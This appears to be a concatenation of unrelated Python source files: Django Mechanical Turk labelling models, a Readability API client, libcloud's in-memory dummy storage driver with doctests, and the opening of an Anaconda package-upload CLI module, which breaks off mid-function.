            new_objects[get_content_tuple(shape)] = [new_obj]
        return new_objects
class ShapePlanarityLabel(MaterialShapeLabelBase):
    """ Vote for whether or not a material shape is flat """

    #: shape being labeled
    shape = models.ForeignKey(MaterialShape, related_name='planarities')

    #: True if the worker voted "planar"
    planar = models.BooleanField(default=False)

    #: True if the worker could not decide
    canttell = models.NullBooleanField()

    def __unicode__(self):
        if self.canttell:
            return "can't tell"
        else:
            return 'planar' if self.planar else 'not planar'

    class Meta:
        verbose_name = "Shape planarity label"
        verbose_name_plural = "Shape planarity labels"

    #@classmethod
    #def mturk_badness(cls, mturk_assignment):
    #""" Return fraction of bad responses for this assignment """
    #labels = cls.objects.filter(mturk_assignment=mturk_assignment)
    #if not labels:
    #return None
    #if any(l.shape.planar_score is None for l in labels):
    #return None
    #bad = sum(1 for l in labels if l.planar != l.shape.planar)
    #return float(bad) / float(len(labels))

    @staticmethod
    def mturk_submit(user, hit_contents, results, time_ms, time_active_ms, version,
                     mturk_assignment=None, **kwargs):
        """ Add new instances from a mturk HIT after the user clicks [submit] """
        if unicode(version) != u'1.0':
            raise ValueError("Unknown version: '%s'" % version)
        if not hit_contents:
            return {}
        # only the total time is reported, so the best we can do is average
        avg_time_ms = time_ms / len(hit_contents)
        avg_time_active_ms = time_active_ms / len(hit_contents)
        new_objects = {}
        for shape in hit_contents:
            # form values arrive as the strings 'true'/'false'
            selected = (
                str(results[unicode(shape.id)]['selected']).lower() == 'true')
            canttell = (
                str(results[unicode(shape.id)]['canttell']).lower() == 'true')
            new_obj, created = shape.planarities.get_or_create(
                user=user,
                mturk_assignment=mturk_assignment,
                time_ms=avg_time_ms,
                time_active_ms=avg_time_active_ms,
                planar=selected,
                canttell=canttell,
            )
            if created:
                new_objects[get_content_tuple(shape)] = [new_obj]
        return new_objects
class MaterialShapeQuality(MaterialShapeLabelBase):
    """ Vote on whether or not a shape is indeed a material or object segmentation """

    #: shape being voted on
    shape = models.ForeignKey(MaterialShape, related_name='qualities')

    #: True if the worker voted "correct segmentation"
    correct = models.BooleanField(default=False)

    #: True if the worker could not decide
    canttell = models.NullBooleanField()

    def __unicode__(self):
        if self.canttell:
            return "can't tell"
        else:
            return 'correct' if self.correct else 'not correct'

    class Meta:
        verbose_name = "Shape quality vote"
        verbose_name_plural = "Shape quality votes"

    #@classmethod
    #def mturk_badness(cls, mturk_assignment):
    #""" Return fraction of bad responses for this assignment """
    #labels = cls.objects.filter(mturk_assignment=mturk_assignment)
    #if not labels:
    #return None
    #if any(l.shape.correct_score is None for l in labels):
    #return None
    #bad = sum(1 for l in labels if l.correct != l.shape.correct
    #and abs(l.shape.correct_score) > 0.5)
    #return float(bad) / float(len(labels))

    @staticmethod
    def mturk_submit(user, hit_contents, results, time_ms, time_active_ms, version,
                     mturk_assignment=None, **kwargs):
        """ Add new instances from a mturk HIT after the user clicks [submit] """
        if unicode(version) != u'1.0':
            raise ValueError("Unknown version: '%s'" % version)
        if not hit_contents:
            return {}
        # only the total time is reported, so the best we can do is average
        avg_time_ms = time_ms / len(hit_contents)
        avg_time_active_ms = time_active_ms / len(hit_contents)
        new_objects = {}
        for shape in hit_contents:
            # form values arrive as the strings 'true'/'false'
            selected = (
                str(results[unicode(shape.id)]['selected']).lower() == 'true')
            canttell = (
                str(results[unicode(shape.id)]['canttell']).lower() == 'true')
            new_obj, created = shape.qualities.get_or_create(
                user=user,
                mturk_assignment=mturk_assignment,
                time_ms=avg_time_ms,
                time_active_ms=avg_time_active_ms,
                correct=selected,
                canttell=canttell,
            )
            if created:
                new_objects[get_content_tuple(shape)] = [new_obj]
        return new_objects
| |
# -*- coding: utf-8 -*-
"""
readability.api
~~~~~~~~~~~~~~~
This module provies the core Readability API interface.
"""
import urllib
import urlparse
import oauth2
from decorator import decorator
from .config import settings
from .models import Bookmark, Article, Domain, Contribution, User
from .helpers import is_collection, to_python, to_api, get_scope
try:
import json
except ImportError:
import simplejson as json
@decorator
def admin_only(f, *args, **kwargs):
    """Admin-level API constraint decorator.
    Raises PermissionsError if settings.admin is not True.
    """
    # The `decorator` package passes the wrapped function plus the original
    # call arguments; the check runs on every call, not at decoration time.
    if not settings.admin:
        # get_scope resolves a human-readable name for the error message.
        func = get_scope(f, args)
        raise PermissionsError('%s is for Readability Admins only.' % (func,))
    return f(*args, **kwargs)
def raise_for_admin(status_code):
    """Raise PermissionsError unless the client is configured as an admin.

    NOTE(review): `status_code` is accepted but never inspected -- confirm
    whether callers rely on passing it.
    """
    if settings.admin:
        return
    raise PermissionsError('Resource for Readability Admins only.')
def raise_for_status(response):
    """Raises the appropriate API error for the given HTTP status, if necessary."""
    code = int(response['status'])
    # Map HTTP status codes to their exception classes; unknown codes pass.
    error_cls = {
        400: BadRequestError,
        401: AuthenticationError,
        403: PermissionsError,
        404: MissingError,
        500: ServerError,
    }.get(code)
    if error_cls is not None:
        raise error_cls(response=response)
class ReadabilityCore(object):
    """The main Readability API interface."""

    def __init__(self):
        # OAuth token and username are populated later by setup_client().
        self.token = None
        self.username = None
        self.settings = settings

    def setup_client(self, token, consumer_key, consumer_secret):
        # `token` is an (oauth_token, oauth_token_secret) pair, i.e. the shape
        # produced by the token_tuple property below.
        token = oauth2.Token(*token)
        consumer = oauth2.Consumer(consumer_key, consumer_secret)
        self.token = token
        self.client = oauth2.Client(consumer, token)
        # Round-trips to the API to resolve the authenticated username.
        # NOTE: get_me() is implemented by the Readability subclass.
        self.username = self.get_me().username
        return True

    @property
    def token_tuple(self):
        """Returns serializable OAuth token."""
        # str(token) renders as a querystring; parse it back into a dict.
        token = dict(urlparse.parse_qsl(str(self.token)))
        return (token['oauth_token'], token['oauth_token_secret'])

    @staticmethod
    def _resource_serialize(o):
        """Returns JSON serialization of given object."""
        return json.dumps(o)

    @staticmethod
    def _resource_deserialize(s):
        """Returns dict deserialization of a given JSON string."""
        try:
            return json.loads(s)
        except ValueError:
            raise ResponseError('The API Response was not valid.')

    def _generate_url(self, resource, params):
        """Generates Readability API Resource URL."""
        # A resource may be a single path string or a sequence of path parts.
        if is_collection(resource):
            resource = map(str, resource)
            resource = '/'.join(resource)
        if params:
            resource += '?%s' % (urllib.urlencode(params))
        return settings.base_url % (resource,)

    def _get_http_resource(self, resource, params=None):
        """GETs HTTP Resource at given path."""
        url = self._generate_url(resource, params)
        if settings.verbose:
            # settings.verbose is expected to be a writable stream when set.
            settings.verbose.write('%s\n' % (url,))
        r, content = self.client.request(url, method='GET')
        raise_for_status(r)
        # Returns the raw response body; headers (r) are consumed here.
        return content

    def _post_http_resource(self, resource, params=None):
        """POSTs HTTP Resource at given path."""
        # NOTE(review): params are sent only in the request body; the URL is
        # built without a query string (None) -- presumably intentional.
        url = self. _generate_url(resource, None)
        params = urllib.urlencode(params)
        r, content = self.client.request(url, method='POST', body=params)
        raise_for_status(r)
        # Returns the response headers dict, not the body.
        return r

    def _delete_http_resource(self, resource, params=None):
        """DELETEs HTTP Resource at given path."""
        # NOTE(review): `params` is accepted but never used here -- confirm
        # whether DELETE query parameters were ever intended.
        url = self. _generate_url(resource, None)
        r, content = self.client.request(url, method='DELETE')
        return r

    def _to_map(self, obj, iterable):
        """Maps given dict iterable to a given Resource object."""
        a = []
        for it in iterable:
            a.append(obj.new_from_dict(it, rdd=self))
        return a

    def _get_resources(self, key, obj, limit=None, **kwargs):
        """GETs resources of given path, maps them to objects, and
        handles paging.
        """
        # Default page size is 50 unless the caller caps the total via limit.
        if (limit is None) and ('per_page' not in kwargs):
            kwargs.update(per_page=50)
        else:
            kwargs.update(per_page=limit)
        items = []
        response = self._get_http_resource(key, params=kwargs)
        response = self._resource_deserialize(response)
        meta = response.get('meta')
        items.extend(self._to_map(obj, response.get(key)))
        # NOTE(review): `len(items) < limit` with limit=None relies on
        # Python 2 ordering (int < None is False); the `or (limit is None)`
        # arm then drives full pagination. This breaks under Python 3.
        if (len(items) < limit) or (limit is None):
            for i in range(meta.get('page')+1, meta.get('num_pages')+1):
                kwargs.update(page=i)
                if (len(items) < limit) or (limit is None):
                    response = self._get_http_resource(key, params=kwargs)
                    response = self._resource_deserialize(response)
                    items.extend(self._to_map(obj, response.get(key)))
        # items[:None] returns everything when no limit was given.
        return items[:limit]

    def _get_resource(self, http_resource, obj, **kwargs):
        """GETs API Resource of given path."""
        item = self._get_http_resource(http_resource, params=kwargs)
        item = self._resource_deserialize(item)
        return obj.new_from_dict(item, rdd=self)

    def _post_resource(self, http_resource, **kwargs):
        """POSTs API Resource of given path."""
        r = self._post_http_resource(http_resource, params=kwargs)
        return r

    def _delete_resource(self, http_resource):
        """DELETEs API Resource of given path."""
        r = self._delete_http_resource(http_resource)
        # 200 and 204 both signal successful deletion.
        if r['status'] in ('200', '204'):
            return True
        else:
            return False
class Readability(ReadabilityCore):
    """Main Readability API Endpoint for user consumption."""

    def __init__(self):
        super(Readability, self).__init__()

    @admin_only
    def get_articles(self, author=None, user=None, domain=None, limit=None, **filters):
        """Gets a list of articles. Admin only.

        Extra keyword filters are expanded into query parameters.
        """
        filters.update(author=author, user=user, domain=domain)
        filters = to_api(
            filters,
            date_keys=(
                'added_since', 'added_until', 'published_since',
                'published_until'
            )
        )
        return self._get_resources('articles', Article, limit=limit, **filters)

    def get_article(self, id):
        """Gets Article of given ID."""
        return self._get_resource(('articles', id), Article)

    def get_bookmarks(self, archive=None, favorite=None, domain=None, order=None, limit=None, **filters):
        """Gets a list of bookmarks."""
        filters.update(
            archive=archive,
            favorite=favorite,
            domain=domain,
            order=order
        )
        filters = to_api(
            filters,
            date_keys=(
                'added_since', 'added_until', 'opened_since', 'opened_until',
                'archived_since', 'archived_until', 'favorited_since',
                'favorited_until', 'updated_since', 'updated_until'
            ),
            int_keys=('archive', 'favorite')
        )
        return self._get_resources('bookmarks', Bookmark, limit=limit, **filters)

    @admin_only
    def get_bookmarks_by_user(self, username, **filters):
        """Gets bookmarks of given user. Admin only."""
        return self.get_bookmarks(user=username, **filters)

    def get_bookmark(self, id):
        """Gets bookmark of given ID."""
        return self._get_resource(('bookmarks', id), Bookmark)

    def get_contributions(self, limit=None, **filters):
        """Gets a list of contributions."""
        # BUGFIX: previously passed `params=filters`, which made
        # _get_resources send a single query parameter literally named
        # "params" whose value was the urlencoded repr of the dict.
        # Expanding with ** matches get_articles/get_bookmarks.
        return self._get_resources('contributions', Contribution, limit=limit, **filters)

    @admin_only
    def get_contributions_by_user(self, username, **filters):
        """Gets a list of contributions by given username. Admin only."""
        return self.get_contributions(user=username, **filters)

    @admin_only
    def get_domains(self, domain=None, limit=None):
        """Gets a list of domains. Admin only.

        .. warning::
            This Query is very slow.
        """
        filters = to_api(dict(domain=domain))
        # BUGFIX: expand filters into query parameters (was `params=filters`).
        return self._get_resources('domains', Domain, limit=limit, **filters)

    @admin_only
    def get_domain(self, id):
        """Gets domain of given ID. Admin only."""
        return self._get_resource(('domains', id), Domain)

    def get_me(self):
        """Returns logged in user."""
        return self._get_resource(('users', '_current'), User)

    @admin_only
    def get_users(self, limit=None, **filters):
        """Returns a list of users. Admin only."""
        filters = to_api(filters, date_keys=('joined_since', 'joined_until'))
        # BUGFIX: expand filters into query parameters (was `params=filters`).
        return self._get_resources('users', User, limit=limit, **filters)

    @admin_only
    def get_user(self, username='_current'):
        """Retrieves a given user. Admin only."""
        return self._get_resource(('users', username), User)

    def add_bookmark(self, url, favorite=False, archive=False):
        """Adds given bookmark and returns the resulting Bookmark."""
        r = self._post_resource('bookmarks', url=url, favorite=favorite, archive=archive)
        # As 409 status code indicates an already bookmarked
        # url, it should be considered as valid, and return
        # the bookmark it points to.
        if r['status'] not in ('200', '202', '409'):
            raise ResponseError('')
        # The Location header ends with the new bookmark's id.
        loc = r['location']
        resource = loc.split('/').pop()
        return self.get_bookmark(resource)
# ----------
# Exceptions
# ----------
class APIError(Exception):
    # NOTE: subclasses' docstrings double as their default error message
    # (via self.__doc__ below), so this base class deliberately has none.
    def __init__(self, msg=None, response=None):
        # Fall back to the class docstring when no explicit message is given.
        self.msg = self.__doc__ if msg is None else msg
        self.response = response

    def __str__(self):
        # Include the raw response when one was captured.
        if self.response is None:
            return repr(self.msg)
        return "%s - response: %s" % (repr(self.msg), repr(self.response))
# NOTE: each docstring below doubles as the exception's default user-facing
# message (APIError.__init__ falls back to self.__doc__), so the wording is
# part of runtime behavior -- do not edit casually.
class PermissionsError(APIError):
    """You do not have proper permission."""

class AuthenticationError(APIError):
    """Authentication failed."""

class ResponseError(APIError):
    """The API Response was unexpected."""

class MissingError(APIError):
    """The Resource does not exist."""

class BadRequestError(APIError):
    """The request could not be understood due to bad syntax. Check your request and try again."""

class ServerError(APIError):
    """The server encountered an error and was unable to complete your request."""
| |
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os.path
import random
import hashlib
from libcloud.utils.py3 import PY3
from libcloud.utils.py3 import b
if PY3:
from io import FileIO as file
from libcloud.common.types import LibcloudError
from libcloud.storage.base import Object, Container, StorageDriver
from libcloud.storage.types import ContainerAlreadyExistsError
from libcloud.storage.types import ContainerDoesNotExistError
from libcloud.storage.types import ContainerIsNotEmptyError
from libcloud.storage.types import ObjectDoesNotExistError
class DummyFileObject(file):
    """In-memory stand-in for a file: read() yields `yield_count` random
    chunks of `chunk_len` characters each.

    Note: file.__init__ (io.FileIO under Python 3) is intentionally not
    called; no real file is opened.
    """
    def __init__(self, yield_count=5, chunk_len=10):
        self._yield_count = yield_count
        self._chunk_len = chunk_len

    def read(self, size):
        """Generator over the dummy chunks; `size` is accepted for
        file-API compatibility but the chunk length is fixed."""
        # BUGFIX: `raise StopIteration` inside a generator is a RuntimeError
        # under PEP 479 (Python 3.7+); a plain loop end is the correct way
        # to finish the generator.
        for _ in range(self._yield_count):
            yield self._get_chunk(self._chunk_len)

    def _get_chunk(self, chunk_len):
        """Return a random string of exactly `chunk_len` characters."""
        # BUGFIX: the original iterated over `random.randint(97, 120)` (an
        # int -> TypeError on first read). Generate chunk_len random
        # characters in the a..x ASCII range instead.
        return ''.join(chr(random.randint(97, 120)) for _ in range(chunk_len))

    def __len__(self):
        # Total number of characters the object will yield.
        return self._yield_count * self._chunk_len
class DummyIterator(object):
    """Iterator over a fixed data sequence that tracks an MD5 digest of
    everything it has handed out."""

    def __init__(self, data=None):
        self.hash = hashlib.md5()
        self._data = data or []
        self._current_item = 0

    def get_md5_hash(self):
        """Hex digest of all values consumed so far."""
        return self.hash.hexdigest()

    def next(self):
        # EAFP: running off the end of the data terminates iteration.
        try:
            value = self._data[self._current_item]
        except IndexError:
            raise StopIteration
        self.hash.update(b(value))
        self._current_item += 1
        return value

    def __next__(self):
        # Python 3 iterator protocol delegates to the Python 2 spelling.
        return self.next()
class DummyStorageDriver(StorageDriver):
    """
    Dummy Storage driver.
    >>> from libcloud.storage.drivers.dummy import DummyStorageDriver
    >>> driver = DummyStorageDriver('key', 'secret')
    >>> container = driver.create_container(container_name='test container')
    >>> container
    <Container: name=test container, provider=Dummy Storage Provider>
    >>> container.name
    'test container'
    >>> container.extra['object_count']
    0
    """

    name = 'Dummy Storage Provider'
    website = 'http://example.com'

    def __init__(self, api_key, api_secret):
        """
        @param api_key: API key or username to used (required)
        @type api_key: C{str}
        @param api_secret: Secret password to be used (required)
        @type api_secret: C{str}
        @rtype: C{None}
        """
        # In-memory store: container name -> {'container': Container,
        # 'objects': {object name -> Object}, 'cdn_url': str}.
        # NOTE(review): StorageDriver.__init__ is not called, so the
        # credentials are accepted but unused by this dummy driver.
        self._containers = {}

    def get_meta_data(self):
        """
        >>> driver = DummyStorageDriver('key', 'secret')
        >>> driver.get_meta_data()['object_count']
        0
        >>> driver.get_meta_data()['container_count']
        0
        >>> driver.get_meta_data()['bytes_used']
        0
        >>> container = driver.create_container(container_name='test container 1')
        >>> container = driver.create_container(container_name='test container 2')
        >>> obj = container.upload_object_via_stream(
        ...  object_name='test object', iterator=DummyFileObject(5, 10), extra={})
        >>> driver.get_meta_data()['object_count']
        1
        >>> driver.get_meta_data()['container_count']
        2
        >>> driver.get_meta_data()['bytes_used']
        50
        @rtype: C{dict}
        """
        # Aggregate counts and total size across every container.
        container_count = len(self._containers)
        object_count = sum([len(self._containers[container]['objects']) for
                            container in self._containers])
        bytes_used = 0
        for container in self._containers:
            objects = self._containers[container]['objects']
            for _, obj in objects.items():
                bytes_used += obj.size
        return {'container_count': int(container_count),
                'object_count': int(object_count),
                'bytes_used': int(bytes_used)}

    def iterate_containers(self):
        """
        >>> driver = DummyStorageDriver('key', 'secret')
        >>> list(driver.iterate_containers())
        []
        >>> container = driver.create_container(container_name='test container 1')
        >>> container
        <Container: name=test container 1, provider=Dummy Storage Provider>
        >>> container.name
        'test container 1'
        >>> container = driver.create_container(container_name='test container 2')
        >>> container
        <Container: name=test container 2, provider=Dummy Storage Provider>
        >>> container = driver.create_container(
        ...  container_name='test container 2') #doctest: +IGNORE_EXCEPTION_DETAIL
        Traceback (most recent call last):
        ContainerAlreadyExistsError:
        >>> container_list=list(driver.iterate_containers())
        >>> sorted([container.name for container in container_list])
        ['test container 1', 'test container 2']
        @inherits: L{StorageDriver.iterate_containers}
        """
        for container in list(self._containers.values()):
            yield container['container']

    def list_container_objects(self, container):
        # Validates existence (raises ContainerDoesNotExistError otherwise).
        container = self.get_container(container.name)
        # NOTE(review): relies on a `objects` attribute on the Container
        # object, which this driver does not set -- confirm against
        # libcloud's Container base class.
        return container.objects

    def get_container(self, container_name):
        """
        >>> driver = DummyStorageDriver('key', 'secret')
        >>> driver.get_container('unknown') #doctest: +IGNORE_EXCEPTION_DETAIL
        Traceback (most recent call last):
        ContainerDoesNotExistError:
        >>> container = driver.create_container(container_name='test container 1')
        >>> container
        <Container: name=test container 1, provider=Dummy Storage Provider>
        >>> container.name
        'test container 1'
        >>> driver.get_container('test container 1')
        <Container: name=test container 1, provider=Dummy Storage Provider>
        @inherits: L{StorageDriver.get_container}
        """
        if container_name not in self._containers:
            raise ContainerDoesNotExistError(driver=self, value=None,
                                             container_name=container_name)
        return self._containers[container_name]['container']

    def get_container_cdn_url(self, container):
        """
        >>> driver = DummyStorageDriver('key', 'secret')
        >>> driver.get_container('unknown') #doctest: +IGNORE_EXCEPTION_DETAIL
        Traceback (most recent call last):
        ContainerDoesNotExistError:
        >>> container = driver.create_container(container_name='test container 1')
        >>> container
        <Container: name=test container 1, provider=Dummy Storage Provider>
        >>> container.name
        'test container 1'
        >>> container.get_cdn_url()
        'http://www.test.com/container/test_container_1'
        @inherits: L{StorageDriver.get_container_cdn_url}
        """
        if container.name not in self._containers:
            raise ContainerDoesNotExistError(driver=self, value=None,
                                             container_name=container.name)
        # cdn_url was precomputed in create_container.
        return self._containers[container.name]['cdn_url']

    def get_object(self, container_name, object_name):
        """
        >>> driver = DummyStorageDriver('key', 'secret')
        >>> driver.get_object('unknown', 'unknown') #doctest: +IGNORE_EXCEPTION_DETAIL
        Traceback (most recent call last):
        ContainerDoesNotExistError:
        >>> container = driver.create_container(container_name='test container 1')
        >>> container
        <Container: name=test container 1, provider=Dummy Storage Provider>
        >>> driver.get_object(
        ...  'test container 1', 'unknown') #doctest: +IGNORE_EXCEPTION_DETAIL
        Traceback (most recent call last):
        ObjectDoesNotExistError:
        >>> obj = container.upload_object_via_stream(object_name='test object',
        ...  iterator=DummyFileObject(5, 10), extra={})
        >>> obj
        <Object: name=test object, size=50, hash=None, provider=Dummy Storage Provider ...>
        @inherits: L{StorageDriver.get_object}
        """
        # Raises ContainerDoesNotExistError first, then checks the object.
        self.get_container(container_name)
        container_objects = self._containers[container_name]['objects']
        if object_name not in container_objects:
            raise ObjectDoesNotExistError(object_name=object_name, value=None,
                                          driver=self)
        return container_objects[object_name]

    def get_object_cdn_url(self, obj):
        """
        >>> driver = DummyStorageDriver('key', 'secret')
        >>> container = driver.create_container(container_name='test container 1')
        >>> container
        <Container: name=test container 1, provider=Dummy Storage Provider>
        >>> obj = container.upload_object_via_stream(object_name='test object 5',
        ...  iterator=DummyFileObject(5, 10), extra={})
        >>> obj
        <Object: name=test object 5, size=50, hash=None, provider=Dummy Storage Provider ...>
        >>> obj.get_cdn_url()
        'http://www.test.com/object/test_object_5'
        @inherits: L{StorageDriver.get_object_cdn_url}
        """
        container_name = obj.container.name
        container_objects = self._containers[container_name]['objects']
        if obj.name not in container_objects:
            raise ObjectDoesNotExistError(object_name=obj.name, value=None,
                                          driver=self)
        # cdn_url was stored in the object's meta_data by _add_object.
        return container_objects[obj.name].meta_data['cdn_url']

    def create_container(self, container_name):
        """
        >>> driver = DummyStorageDriver('key', 'secret')
        >>> container = driver.create_container(container_name='test container 1')
        >>> container
        <Container: name=test container 1, provider=Dummy Storage Provider>
        >>> container = driver.create_container(
        ...  container_name='test container 1') #doctest: +IGNORE_EXCEPTION_DETAIL
        Traceback (most recent call last):
        ContainerAlreadyExistsError:
        @inherits: L{StorageDriver.create_container}
        """
        if container_name in self._containers:
            raise ContainerAlreadyExistsError(container_name=container_name,
                                              value=None, driver=self)
        extra = {'object_count': 0}
        container = Container(name=container_name, extra=extra, driver=self)
        # Spaces in names become underscores in the fake CDN URL.
        self._containers[container_name] = {'container': container,
                                            'objects': {},
                                            'cdn_url':
                                            'http://www.test.com/container/%s' %
                                            (container_name.replace(' ', '_'))
                                            }
        return container

    def delete_container(self, container):
        """
        >>> driver = DummyStorageDriver('key', 'secret')
        >>> container = Container(name = 'test container',
        ...    extra={'object_count': 0}, driver=driver)
        >>> driver.delete_container(container=container)#doctest: +IGNORE_EXCEPTION_DETAIL
        Traceback (most recent call last):
        ContainerDoesNotExistError:
        >>> container = driver.create_container(
        ...      container_name='test container 1') #doctest: +IGNORE_EXCEPTION_DETAIL
        >>> len(driver._containers)
        1
        >>> driver.delete_container(container=container)
        True
        >>> len(driver._containers)
        0
        >>> container = driver.create_container(
        ...    container_name='test container 1') #doctest: +IGNORE_EXCEPTION_DETAIL
        >>> obj = container.upload_object_via_stream(
        ...   object_name='test object', iterator=DummyFileObject(5, 10), extra={})
        >>> driver.delete_container(container=container)#doctest: +IGNORE_EXCEPTION_DETAIL
        Traceback (most recent call last):
        ContainerIsNotEmptyError:
        @inherits: L{StorageDriver.delete_container}
        """
        container_name = container.name
        if container_name not in self._containers:
            raise ContainerDoesNotExistError(container_name=container_name,
                                             value=None, driver=self)
        # Only empty containers may be deleted.
        container = self._containers[container_name]
        if len(container['objects']) > 0:
            raise ContainerIsNotEmptyError(container_name=container_name,
                                           value=None, driver=self)
        del self._containers[container_name]
        return True

    def download_object(self, obj, destination_path, overwrite_existing=False,
                        delete_on_failure=True):
        # Delegates to the inherited _save_object, feeding it dummy content.
        kwargs_dict = {'obj': obj,
                       'response': DummyFileObject(),
                       'destination_path': destination_path,
                       'overwrite_existing': overwrite_existing,
                       'delete_on_failure': delete_on_failure}
        return self._save_object(**kwargs_dict)

    def download_object_as_stream(self, obj, chunk_size=None):
        """
        >>> driver = DummyStorageDriver('key', 'secret')
        >>> container = driver.create_container(
        ...   container_name='test container 1') #doctest: +IGNORE_EXCEPTION_DETAIL
        >>> obj = container.upload_object_via_stream(object_name='test object',
        ...    iterator=DummyFileObject(5, 10), extra={})
        >>> stream = container.download_object_as_stream(obj)
        >>> stream #doctest: +ELLIPSIS
        <...closed...>
        @inherits: L{StorageDriver.download_object_as_stream}
        """
        # chunk_size is ignored; the dummy object has fixed-size chunks.
        return DummyFileObject()

    def upload_object(self, file_path, container, object_name, extra=None,
                      file_hash=None):
        """
        >>> driver = DummyStorageDriver('key', 'secret')
        >>> container = driver.create_container(container_name='test container 1')
        >>> container.upload_object(file_path='/tmp/inexistent.file',
        ...     object_name='test') #doctest: +IGNORE_EXCEPTION_DETAIL
        Traceback (most recent call last):
        LibcloudError:
        >>> file_path = path = os.path.abspath(__file__)
        >>> file_size = os.path.getsize(file_path)
        >>> obj = container.upload_object(file_path=file_path, object_name='test')
        >>> obj #doctest: +ELLIPSIS
        <Object: name=test, size=...>
        >>> obj.size == file_size
        True
        @inherits: L{StorageDriver.upload_object}
        @param file_hash: File hash
        @type file_hash: C{str}
        """
        if not os.path.exists(file_path):
            raise LibcloudError(value='File %s does not exist' % (file_path),
                                driver=self)
        # Only the on-disk size is recorded; file content is never read.
        size = os.path.getsize(file_path)
        return self._add_object(container=container, object_name=object_name,
                                size=size, extra=extra)

    def upload_object_via_stream(self, iterator, container,
                                 object_name, extra=None):
        """
        >>> driver = DummyStorageDriver('key', 'secret')
        >>> container = driver.create_container(
        ...    container_name='test container 1') #doctest: +IGNORE_EXCEPTION_DETAIL
        >>> obj = container.upload_object_via_stream(
        ...   object_name='test object', iterator=DummyFileObject(5, 10), extra={})
        >>> obj #doctest: +ELLIPSIS
        <Object: name=test object, size=50, ...>
        @inherits: L{StorageDriver.upload_object_via_stream}
        """
        # The iterator is never consumed; only its reported length matters.
        size = len(iterator)
        return self._add_object(container=container, object_name=object_name,
                                size=size, extra=extra)

    def delete_object(self, obj):
        """
        >>> driver = DummyStorageDriver('key', 'secret')
        >>> container = driver.create_container(
        ...   container_name='test container 1') #doctest: +IGNORE_EXCEPTION_DETAIL
        >>> obj = container.upload_object_via_stream(object_name='test object',
        ...   iterator=DummyFileObject(5, 10), extra={})
        >>> obj #doctest: +ELLIPSIS
        <Object: name=test object, size=50, ...>
        >>> container.delete_object(obj=obj)
        True
        >>> obj = Object(name='test object 2',
        ...    size=1000, hash=None, extra=None,
        ...    meta_data=None, container=container,driver=None)
        >>> container.delete_object(obj=obj) #doctest: +IGNORE_EXCEPTION_DETAIL
        Traceback (most recent call last):
        ObjectDoesNotExistError:
        @inherits: L{StorageDriver.delete_object}
        """
        container_name = obj.container.name
        object_name = obj.name
        # get_object validates existence; raises ObjectDoesNotExistError.
        obj = self.get_object(container_name=container_name,
                              object_name=object_name)
        del self._containers[container_name]['objects'][object_name]
        return True

    def _add_object(self, container, object_name, size, extra=None):
        # Shared helper for both upload paths; registers a fake Object.
        container = self.get_container(container.name)
        extra = extra or {}
        meta_data = extra.get('meta_data', {})
        # Precompute the fake CDN URL (spaces become underscores).
        meta_data.update({'cdn_url': 'http://www.test.com/object/%s' %
                         (object_name.replace(' ', '_'))})
        obj = Object(name=object_name, size=size, extra=extra, hash=None,
                     meta_data=meta_data, container=container, driver=self)
        self._containers[container.name]['objects'][object_name] = obj
        return obj
# Run the embedded doctests when this module is executed directly.
if __name__ == "__main__":
    import doctest
    doctest.testmod()
| |
"""
anaconda upload CONDA_PACKAGE_1.bz2
anaconda upload notebook.ipynb
anaconda upload environment.yml
##### See Also
* [Uploading a Conda Package](https://docs.anaconda.com/anaconda-repository/user-guide/tasks/pkgs/use-pkg-managers/#uploading-a-conda-package)
* [Uploading a PyPI Package](https://docs.anaconda.com/anaconda-repository/user-guide/tasks/pkgs/use-pkg-managers/#uploading-pypi-packages)
"""
from __future__ import unicode_literals
import argparse
import tempfile
import logging
import os
import subprocess
from glob import glob
from os.path import exists
import nbformat
from six.moves import input
from binstar_client import errors
from binstar_client.utils import bool_input, DEFAULT_CONFIG, get_config, get_server_api, upload_print_callback
from binstar_client.utils.config import PACKAGE_TYPES
from binstar_client.utils.projects import upload_project
from binstar_client.utils.detect import detect_package_type, get_attrs
logger = logging.getLogger('binstar.upload')
def verbose_package_type(pkg_type, lowercase=True):
    """Human-readable name for a package-type code ('unknown' if unmapped)."""
    name = PACKAGE_TYPES.get(pkg_type, 'unknown')
    return name.lower() if lowercase else name
def create_release(aserver_api, username, package_name, version, release_attrs, announce=None):
    """Create the release non-interactively (no prompts; optional announcement)."""
    aserver_api.add_release(username, package_name, version, [], announce, release_attrs)
def create_release_interactive(aserver_api, username, package_name, version, release_attrs):
    """Prompt the user to create a missing release, then create it.

    Exits the process (SystemExit) if the user declines.
    """
    logger.info('The release "%s/%s/%s" does not exist', username, package_name, version)
    if not bool_input('Would you like to create it now?'):
        logger.info('good-bye')
        raise SystemExit(-1)
    description = input('Enter a short description of the release:\n')
    # NOTE(review): `description` is collected but never passed to
    # add_release -- confirm whether it should be merged into release_attrs.
    logger.info("Announcements are emailed to your package followers.")
    make_announcement = bool_input('Would you like to make an announcement to the package followers?', False)
    if make_announcement:
        announce = input('Markdown Announcement:\n')
    else:
        announce = ''
    aserver_api.add_release(username, package_name, version, [], announce, release_attrs)
def determine_package_type(filename, args):
    """
    return the file type from the inspected package or from the
    -t/--package-type argument
    """
    package_type = args.package_type
    if not package_type:
        logger.info('Detecting file type...')
        package_type = detect_package_type(filename)
    if package_type is None:
        message = 'Could not detect package type of file %r please specify package type with option --package-type' % filename
        logger.error(message)
        raise errors.BinstarError(message)
    logger.info('File type is "%s"', package_type)
    return package_type
def get_package_name(args, package_attrs, filename, package_type):
    """Resolve the package name from --package or the file's own metadata.

    `filename` is unused here but kept for signature compatibility with
    the sibling get_version/get_attrs helpers.

    Raises errors.BinstarError when the command-line name conflicts with
    the detected one, or when neither source provides a name.
    """
    if args.package:
        if 'name' in package_attrs and package_attrs['name'].lower() != args.package.lower():
            # BUGFIX: the message previously rendered as '" foo"' with a
            # stray space inside the opening quote.
            msg = 'Package name on the command line "{}" does not match the package name in the file "{}"'.format(
                args.package.lower(), package_attrs['name'].lower()
            )
            logger.error(msg)
            raise errors.BinstarError(msg)
        package_name = args.package
    else:
        if 'name' not in package_attrs:
